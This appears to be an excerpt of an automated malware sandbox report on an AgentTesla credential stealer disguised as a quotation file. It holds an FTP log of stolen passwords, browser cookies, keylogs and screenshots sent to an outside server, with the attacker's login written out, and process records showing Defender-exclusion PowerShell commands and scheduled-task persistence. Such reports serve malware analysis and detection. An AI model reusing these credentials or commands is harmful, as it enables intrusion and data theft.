Sep 27, 2024 13:10:29.822135925 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 230 OK. Current restricted directory is /
Sep 27, 2024 13:10:30.154460907 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 504 Unknown command
Sep 27, 2024 13:10:30.154666901 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | PWD
Sep 27, 2024 13:10:30.482898951 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 257 "/" is your current location
Sep 27, 2024 13:10:30.483570099 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | TYPE I
Sep 27, 2024 13:10:30.811661959 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 200 TYPE is now 8-bit binary
Sep 27, 2024 13:10:30.812300920 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | PASV
Sep 27, 2024 13:10:31.140465021 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,217,178)
Sep 27, 2024 13:10:31.146662951 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | STOR PW_user-849224_2024_09_27_07_10_27.html
Sep 27, 2024 13:10:31.976399899 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection
Sep 27, 2024 13:10:32.303776026 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred
    226 0.336 seconds (measured here), 1.01 Kbytes per second
Sep 27, 2024 13:10:32.323329926 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | PASV
Sep 27, 2024 13:10:32.656864882 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,235,22)
Sep 27, 2024 13:10:32.663347960 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | STOR CO_Chrome_Default.txt_user-849224_2024_09_27_13_09_18.txt
Sep 27, 2024 13:10:33.498569965 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection
Sep 27, 2024 13:10:33.828073978 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred
    226 0.328 seconds (measured here), 9.98 Kbytes per second
Sep 27, 2024 13:10:33.828564882 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | PASV
Sep 27, 2024 13:10:34.156984091 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,238,235)
Sep 27, 2024 13:10:34.162580967 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | STOR CO_Firefox_fqs92o4p.default-release.txt_user-849224_2024_09_27_15_28_13.txt
Sep 27, 2024 13:10:34.992522955 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection
Sep 27, 2024 13:10:35.323205948 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 226 File successfully transferred
                                      Sep 27, 2024 13:11:39.040805101 CEST4973721192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:11:39.378043890 CEST2149737110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,204,216)
                                      Sep 27, 2024 13:11:39.386344910 CEST4973721192.168.2.4110.4.45.197STOR KL_user-849224_2024_10_15_03_01_59.html
                                      Sep 27, 2024 13:11:40.304414988 CEST2149737110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:11:40.667108059 CEST2149737110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 0.361 seconds (measured here), 0.76 Kbytes per second
                                      Sep 27, 2024 13:11:58.709117889 CEST4975621192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:11:59.099595070 CEST2149756110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,204,104)
                                      Sep 27, 2024 13:11:59.110579967 CEST4975621192.168.2.4110.4.45.197STOR SC_user-849224_2024_10_14_02_30_34.jpeg
                                      Sep 27, 2024 13:11:59.945193052 CEST2149756110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:12:00.780853033 CEST2149756110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 0.836 seconds (measured here), 66.92 Kbytes per second
                                      Sep 27, 2024 13:12:01.023907900 CEST2149756110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 0.836 seconds (measured here), 66.92 Kbytes per second
                                      Sep 27, 2024 13:12:19.012639999 CEST4973721192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:12:19.463406086 CEST2149737110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,218,150)
                                      Sep 27, 2024 13:12:19.528964043 CEST4973721192.168.2.4110.4.45.197STOR SC_user-849224_2024_11_03_04_07_46.jpeg
                                      Sep 27, 2024 13:12:19.748332024 CEST4975621192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:12:20.253776073 CEST2149756110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,244,97)
                                      Sep 27, 2024 13:12:20.294255972 CEST4975621192.168.2.4110.4.45.197STOR SC_user-849224_2024_10_25_12_14_45.jpeg
                                      Sep 27, 2024 13:12:20.528198004 CEST2149737110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:12:20.766846895 CEST2149737110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:12:21.233882904 CEST2149756110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:12:21.349622011 CEST2149737110.4.45.197192.168.2.4226-File successfully transferred
                                      226 0.802 seconds (measured here), 69.67 Kbytes per second
                                      Sep 27, 2024 13:12:22.146176100 CEST2149756110.4.45.197192.168.2.4226-File successfully transferred
                                      226 0.937 seconds (measured here), 59.65 Kbytes per second
                                      Sep 27, 2024 13:12:26.871378899 CEST4975621192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:12:27.250178099 CEST2149756110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,240,84)
                                      Sep 27, 2024 13:12:27.264462948 CEST4975621192.168.2.4110.4.45.197STOR SC_user-849224_2024_10_30_18_53_08.jpeg
                                      Sep 27, 2024 13:12:28.204030037 CEST2149756110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:12:29.347023964 CEST2149756110.4.45.197192.168.2.4226-File successfully transferred
                                      226 0.971 seconds (measured here), 57.55 Kbytes per second
                                      Sep 27, 2024 13:12:29.463661909 CEST2149756110.4.45.197192.168.2.4226-File successfully transferred
                                      226 0.971 seconds (measured here), 57.55 Kbytes per second
                                      Sep 27, 2024 13:12:30.072341919 CEST4975621192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:12:30.461297035 CEST2149756110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,218,16)
                                      Sep 27, 2024 13:12:30.466968060 CEST4975621192.168.2.4110.4.45.197STOR SC_user-849224_2024_11_05_10_22_41.jpeg
                                      Sep 27, 2024 13:12:31.309773922 CEST2149756110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:12:32.126585960 CEST2149756110.4.45.197192.168.2.4226-File successfully transferred
                                      226 0.818 seconds (measured here), 68.35 Kbytes per second
                                      Sep 27, 2024 13:12:37.840342999 CEST4973721192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:12:38.203234911 CEST2149737110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,250,130)
                                      Sep 27, 2024 13:12:38.208956003 CEST4973721192.168.2.4110.4.45.197STOR SC_user-849224_2024_11_14_11_04_28.jpeg
                                      Sep 27, 2024 13:12:38.216949940 CEST4975621192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:12:38.587141991 CEST2149756110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,216,142)
                                      Sep 27, 2024 13:12:38.592953920 CEST4975621192.168.2.4110.4.45.197STOR SC_user-849224_2024_11_11_04_13_22.jpeg
                                      Sep 27, 2024 13:12:39.049989939 CEST2149737110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:12:39.521429062 CEST2149756110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:12:39.848197937 CEST2149737110.4.45.197192.168.2.4226-File successfully transferred
                                      226 0.802 seconds (measured here), 69.67 Kbytes per second
                                      Sep 27, 2024 13:12:40.469153881 CEST2149756110.4.45.197192.168.2.4226-File successfully transferred
                                      226 0.946 seconds (measured here), 59.07 Kbytes per second
                                      Sep 27, 2024 13:12:45.103346109 CEST4975621192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:12:45.459942102 CEST2149756110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,217,216)
                                      Sep 27, 2024 13:12:45.467314959 CEST4975621192.168.2.4110.4.45.197STOR SC_user-849224_2024_11_18_13_13_57.jpeg
                                      Sep 27, 2024 13:12:46.360636950 CEST2149756110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:12:47.265567064 CEST2149756110.4.45.197192.168.2.4226-File successfully transferred
                                      226 0.905 seconds (measured here), 61.79 Kbytes per second
                                      Sep 27, 2024 13:12:53.126218081 CEST2149777110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                      220-You are user number 13 of 50 allowed.
                                      220-Local time is now 19:12. Server port: 21.
                                      220-This is a private system - No anonymous login
                                      220-IPv6 connections are also welcome on this server.
                                      220 You will be disconnected after 15 minutes of inactivity.
                                      Sep 27, 2024 13:12:53.126368999 CEST4977721192.168.2.4110.4.45.197USER origin@haliza.com.my
                                      Sep 27, 2024 13:12:53.454895973 CEST2149777110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                      Sep 27, 2024 13:12:53.456473112 CEST4977721192.168.2.4110.4.45.197PASS JesusChrist007$
                                      Sep 27, 2024 13:12:53.820796013 CEST2149777110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                      Sep 27, 2024 13:12:54.150491953 CEST2149777110.4.45.197192.168.2.4504 Unknown command
                                      Sep 27, 2024 13:12:54.152523041 CEST4977721192.168.2.4110.4.45.197PWD
                                      Sep 27, 2024 13:12:54.480330944 CEST2149777110.4.45.197192.168.2.4257 "/" is your current location
                                      Sep 27, 2024 13:12:54.480482101 CEST4977721192.168.2.4110.4.45.197TYPE I
                                      Sep 27, 2024 13:12:54.806366920 CEST2149777110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                      Sep 27, 2024 13:12:54.806555033 CEST4977721192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:12:55.133074045 CEST2149777110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,228,252)
                                      Sep 27, 2024 13:12:55.138752937 CEST4977721192.168.2.4110.4.45.197STOR SC_user-849224_2024_11_23_20_57_19.jpeg
                                      Sep 27, 2024 13:12:56.066729069 CEST2149777110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:12:56.997684002 CEST2149777110.4.45.197192.168.2.4226-File successfully transferred
                                      226 0.931 seconds (measured here), 65.26 Kbytes per second
                                      Sep 27, 2024 13:12:57.608388901 CEST4973721192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:12:57.973038912 CEST2149737110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,224,62)
                                      Sep 27, 2024 13:12:57.981863976 CEST4973721192.168.2.4110.4.45.197STOR SC_user-849224_2024_11_25_03_40_54.jpeg
                                      Sep 27, 2024 13:12:58.811820030 CEST2149737110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:12:59.608923912 CEST2149737110.4.45.197192.168.2.4226-File successfully transferred
                                      226 0.804 seconds (measured here), 69.50 Kbytes per second
                                      Sep 27, 2024 13:13:26.072145939 CEST4973721192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:13:26.452203989 CEST2149737110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,201,90)
                                      Sep 27, 2024 13:13:26.460886002 CEST4973721192.168.2.4110.4.45.197STOR SC_user-849224_2024_12_14_01_34_56.jpeg
                                      Sep 27, 2024 13:13:27.453784943 CEST2149737110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:13:28.407711029 CEST2149737110.4.45.197192.168.2.4226-File successfully transferred
                                      226 0.934 seconds (measured here), 59.88 Kbytes per second
                                      Sep 27, 2024 13:13:44.648521900 CEST4973721192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:13:45.057925940 CEST2149737110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,221,92)
                                      Sep 27, 2024 13:13:45.077049971 CEST4973721192.168.2.4110.4.45.197STOR SC_user-849224_2024_12_24_06_30_21.jpeg
                                      Sep 27, 2024 13:13:45.984015942 CEST2149737110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:13:46.922559023 CEST2149737110.4.45.197192.168.2.4226-File successfully transferred
                                      226 0.931 seconds (measured here), 60.04 Kbytes per second
                                      Sep 27, 2024 13:13:52.715584040 CEST4973721192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:13:53.077083111 CEST2149737110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,241,63)
                                      Sep 27, 2024 13:13:53.082746029 CEST4973721192.168.2.4110.4.45.197STOR SC_user-849224_2024_12_29_21_58_53.jpeg
                                      Sep 27, 2024 13:13:53.906615019 CEST2149737110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:13:54.731836081 CEST2149737110.4.45.197192.168.2.4226-File successfully transferred
                                      226 0.798 seconds (measured here), 70.09 Kbytes per second
                                      Sep 27, 2024 13:14:02.400526047 CEST4973721192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:14:02.839585066 CEST2149737110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,250,95)
                                      Sep 27, 2024 13:14:02.845113993 CEST4973721192.168.2.4110.4.45.197STOR SC_user-849224_2025_01_07_06_50_58.jpeg
                                      Sep 27, 2024 13:14:03.993027925 CEST2149737110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:14:04.215801001 CEST2149737110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:14:05.018769026 CEST2149737110.4.45.197192.168.2.4226-File successfully transferred
                                      226 1.343 seconds (measured here), 41.63 Kbytes per second
                                      Sep 27, 2024 13:14:12.806090117 CEST4973721192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:14:13.186691046 CEST2149737110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,242,137)
                                      Sep 27, 2024 13:14:13.192327976 CEST4973721192.168.2.4110.4.45.197STOR SC_user-849224_2024_09_27_07_14_12.jpeg
                                      Sep 27, 2024 13:14:13.666157007 CEST2149790110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                      220-You are user number 14 of 50 allowed.
                                      220-Local time is now 19:14. Server port: 21.
                                      220-This is a private system - No anonymous login
                                      220-IPv6 connections are also welcome on this server.
                                      220 You will be disconnected after 15 minutes of inactivity.
                                      Sep 27, 2024 13:14:13.666340113 CEST4979021192.168.2.4110.4.45.197USER origin@haliza.com.my
                                      Sep 27, 2024 13:14:13.965307951 CEST2149791110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                      220-You are user number 15 of 50 allowed.
                                      220-Local time is now 19:14. Server port: 21.
                                      220-This is a private system - No anonymous login
                                      220-IPv6 connections are also welcome on this server.
                                      220 You will be disconnected after 15 minutes of inactivity.
                                      Sep 27, 2024 13:14:13.965465069 CEST4979121192.168.2.4110.4.45.197USER origin@haliza.com.my
                                      Sep 27, 2024 13:14:14.024213076 CEST2149737110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:14:14.053566933 CEST2149790110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                      Sep 27, 2024 13:14:14.053886890 CEST4979021192.168.2.4110.4.45.197PASS JesusChrist007$
                                      Sep 27, 2024 13:14:14.334882975 CEST2149791110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                      Sep 27, 2024 13:14:14.335005045 CEST4979121192.168.2.4110.4.45.197PASS JesusChrist007$
                                      Sep 27, 2024 13:14:14.443470001 CEST2149790110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                      Sep 27, 2024 13:14:14.713192940 CEST2149791110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                      Sep 27, 2024 13:14:14.776681900 CEST2149790110.4.45.197192.168.2.4504 Unknown command
                                      Sep 27, 2024 13:14:14.831434011 CEST2149737110.4.45.197192.168.2.4226-File successfully transferred
                                      226 0.810 seconds (measured here), 69.05 Kbytes per second


                                      Target ID:0
                                      Start time:07:09:57
                                      Start date:27/09/2024
                                      Path:C:\Users\user\Desktop\rQuotation3200025006.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\rQuotation3200025006.exe"
                                      Imagebase:0x1f0000
                                      File size:645'120 bytes
                                      MD5 hash:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1732806803.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1732806803.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:07:10:00
                                      Start date:27/09/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rQuotation3200025006.exe"
                                      Imagebase:0x880000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:07:10:00
                                      Start date:27/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:4
                                      Start time:07:10:00
                                      Start date:27/09/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pBBqGOzrz.exe"
                                      Imagebase:0x880000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:07:10:00
                                      Start date:27/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:6
                                      Start time:07:10:00
                                      Start date:27/09/2024
                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp3D2.tmp"
                                      Imagebase:0x6f0000
                                      File size:187'904 bytes
                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:7
                                      Start time:07:10:00
                                      Start date:27/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:8
                                      Start time:07:10:00
                                      Start date:27/09/2024
                                      Path:C:\Users\user\Desktop\rQuotation3200025006.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\rQuotation3200025006.exe"
                                      Imagebase:0x8c0000
                                      File size:645'120 bytes
                                      MD5 hash:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4163306810.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4163306810.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4163306810.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:false

                                      Target ID:9
                                      Start time:07:10:03
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\pBBqGOzrz.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\pBBqGOzrz.exe
                                      Imagebase:0x1c0000
                                      File size:645'120 bytes
                                      MD5 hash:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 58%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:10
                                      Start time:07:10:10
                                      Start date:27/09/2024
                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp1AB5.tmp"
                                      Imagebase:0x6f0000
                                      File size:187'904 bytes
                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:11
                                      Start time:07:10:09
                                      Start date:27/09/2024
                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                      Imagebase:0x7ff693ab0000
                                      File size:496'640 bytes
                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:12
                                      Start time:07:10:10
                                      Start date:27/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:13
                                      Start time:07:10:11
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\pBBqGOzrz.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Roaming\pBBqGOzrz.exe"
                                      Imagebase:0x180000
                                      File size:645'120 bytes
                                      MD5 hash:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:14
                                      Start time:07:10:11
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\pBBqGOzrz.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\pBBqGOzrz.exe"
                                      Imagebase:0xff0000
                                      File size:645'120 bytes
                                      MD5 hash:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.4164492788.000000000354A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.4164492788.0000000003501000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.4164492788.0000000003501000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:false

                                      Target ID:16
                                      Start time:07:10:16
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                      Imagebase:0x90000
                                      File size:645'120 bytes
                                      MD5 hash:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 58%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:17
                                      Start time:07:10:17
                                      Start date:27/09/2024
                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp4705.tmp"
                                      Imagebase:0x6f0000
                                      File size:187'904 bytes
                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:18
                                      Start time:07:10:17
                                      Start date:27/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:19
                                      Start time:07:10:17
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                      Imagebase:0x2f0000
                                      File size:645'120 bytes
                                      MD5 hash:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:20
                                      Start time:07:10:17
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                      Imagebase:0xc0000
                                      File size:645'120 bytes
                                      MD5 hash:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:21
                                      Start time:07:10:17
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                      Imagebase:0x240000
                                      File size:645'120 bytes
                                      MD5 hash:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:22
                                      Start time:07:10:17
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                      Imagebase:0xe80000
                                      File size:645'120 bytes
                                      MD5 hash:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
